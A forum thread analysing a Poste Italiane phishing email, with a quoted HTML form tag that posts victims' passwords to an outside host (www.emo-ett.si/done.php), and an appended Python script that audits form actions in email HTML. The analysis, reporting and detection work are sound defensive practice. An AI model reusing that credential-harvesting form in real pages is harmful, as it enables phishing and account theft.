
What's this phish doing?


All times are UTC - 5 hours [ DST ]


Posted: Fri Jan 20, 2012 9:09 pm
Spammer Killing Machine

Joined: Sun Jun 13, 2010 5:22 pm
Posts: 528
Regarding http://www.spamcop.net/sc?id=z5229153446z9f151b466025ba16b4c8e4baad30b919z;action=display ,
efa wrote:
... and no POST tag are there.
I noticed this:
Code:
<FORM NAME="Login" method="POST" action="www.emo-ett.si/done.php" onsubmit="javascript: return logintest(this);">

The email constructs an HTML form that collects passwords and other data. I did not test the form to see if JavaScript altered its action, but it appears to use a POST service provided by www.emo-ett.si (in Slovenia) that logs the stolen data before redirecting to the legitimate http://poste.it site.

I have taken the liberty of sharing the email message with PhishTank: http://www.phishtank.com/phish_detail.php?phish_id=1346220
and with WOT: http://www.mywot.com/en/scorecard/emo-ett.si/comment-39291654
The PhishTank screenshot most probably shows the legitimate Poste Italiane web page, after the redirection which I mentioned.

[Edited for grammar.]


Last edited by NotBuyingIt on Tue Jan 24, 2012 2:33 am, edited 1 time in total.

Posted: Sat Jan 21, 2012 12:51 pm
Site Admin

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
I'd like to add that the complete idiot behind this particular phishing effort hasn't even constructed the form properly.

Code:
<FORM NAME="Login" method="POST" action="www.emo-ett.si/done.php" onsubmit="javascript: return logintest(this);">

That will fail. He didn't include the "http://" in the "action" portion of the form tag, so it will look for a local file named "www.emo-ett.si/done.php", which doesn't exist.

Worse: he hasn't labeled his inputs, so there are five fields which aren't described, for which the phishing victim won't understand their expected values.

A true genius. :roll:

I'm reporting the phishing attack to the hosting company for emo-ett.si. Never hurts.

SiL


Posted: Mon Jan 23, 2012 5:29 pm
Spammer Exterminator

Joined: Wed May 02, 2007 8:59 pm
Posts: 1055
Oh, it was a bug in xPhish V.0.01.04 2011/11/15.
I corrected this in V.0.01.05 2012/01/23; now it can find POST links also when no other NOT scam links are found.
Thank you.
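
Added example, not part of the thread and not xPhish's code: a Python check that pulls form targets out of an HTML message and resolves each action the way a browser would, showing where the scheme-less action quoted above actually points. The base URL `http://webmail.example/mail/view.html`, the function names and the hostname heuristic are assumptions of this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: the form tag quoted in the thread, plus an assumed
# location for the page that renders the message (not from the thread).
SAMPLE_HTML = ('<FORM NAME="Login" method="POST" action="www.emo-ett.si/done.php" '
               'onsubmit="javascript: return logintest(this);">')
SAMPLE_BASE = "http://webmail.example/mail/view.html"

HOST_RE = re.compile(r"^(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}$")


class FormCollector(HTMLParser):
    """Record (method, action) for each <form>; names arrive lowercased."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            a = dict(attrs)
            self.forms.append(((a.get("method") or "GET").upper(),
                               a.get("action") or ""))


def probable_host(action):
    """Heuristic (assumption): a scheme-less 'host.tld/path' action was
    probably meant as an external host, so it is worth reporting."""
    parts = urlsplit(action)
    if parts.scheme or parts.netloc or "/" not in action:
        return None
    first = action.split("/", 1)[0]
    return first if HOST_RE.match(first) else None


def audit_forms(html, base_url):
    """Resolve every form action against base_url, as a browser does."""
    collector = FormCollector()
    collector.feed(html)
    collector.close()
    return [{"method": m, "action": act,
             "resolved": urljoin(base_url, act),
             "probable_host": probable_host(act)}
            for m, act in collector.forms]


if __name__ == "__main__":
    for finding in audit_forms(SAMPLE_HTML, SAMPLE_BASE):
        print(finding)
```

The `resolved` value depends entirely on the base URL of whatever renders the message, so a report should carry both the raw action and the probable host.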

